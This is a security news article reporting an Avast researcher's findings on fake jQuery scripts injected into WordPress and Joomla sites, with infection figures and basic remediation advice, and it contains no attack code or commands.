Hackers are using the popular jQuery library to inject malicious code into websites powered by WordPress and Joomla. It’s a fairly widespread issue: Since November 2015, Avast has registered more than 4.5 million users who encountered the infection.
Malicious code was found in almost 70 million unique files on hacked websites.
According to Avast researcher Alexej Savcin fake jQuery injections have been very popular among hackers, because jQuery itself is popular.
“JQuery is a very popular JavaScript library,” he explained in a blog. “The basic aim of this library is to erase the differences between implementations of JavaScript in various web browsers. If you have ever tried web coding, you know how tedious it can be to make the code do the same thing in different browsers. Sometimes it is a really big challenge. In such situations, this library can be very useful.”
Perhaps it was only a matter of time until such a well-known library gets the attention of those who want to use it for different purposes other than web coding—but Savcin said that one of the most popular infections of the last couple of months is an attack that injects fake jQuery script into the head section of CML websites powered by WordPress and Joomla.
The script is a bit stealthy—the researcher noted that it’s located in such a way that normal visitors wouldn’t notice anything amiss unless they look into source code.
Once the code is examined, “at first glance you see simple code that is not obfuscated,” he said. “There are only a few variables and one IF statement which inserts another JavaScript source. The only thing that is changing is ‘var base =’, which points to another hacked website that serves as a source of injected malicious script.”
The number of hacked domains (70 million) that are used as a source for malicious JS code is abnormally high, which is why this kind of attack was and still is very popular on a daily basis.
To remediate the issue, Savcin recommends starting with the basics: “Reset your password. If it doesn't help, you can leverage tools like phpMyAdmin and Adminer to log into your database directly, bypassing your Admin login page and resetting your user in the users table,” he advised. Once in, the site’s database and files should be restored from a backup version. Once clean, webmasters shouldn’t forget to update their installations; older versions are naturally more prone to hacks than newer versions.
Photo © David Molina G/Shutterstock.com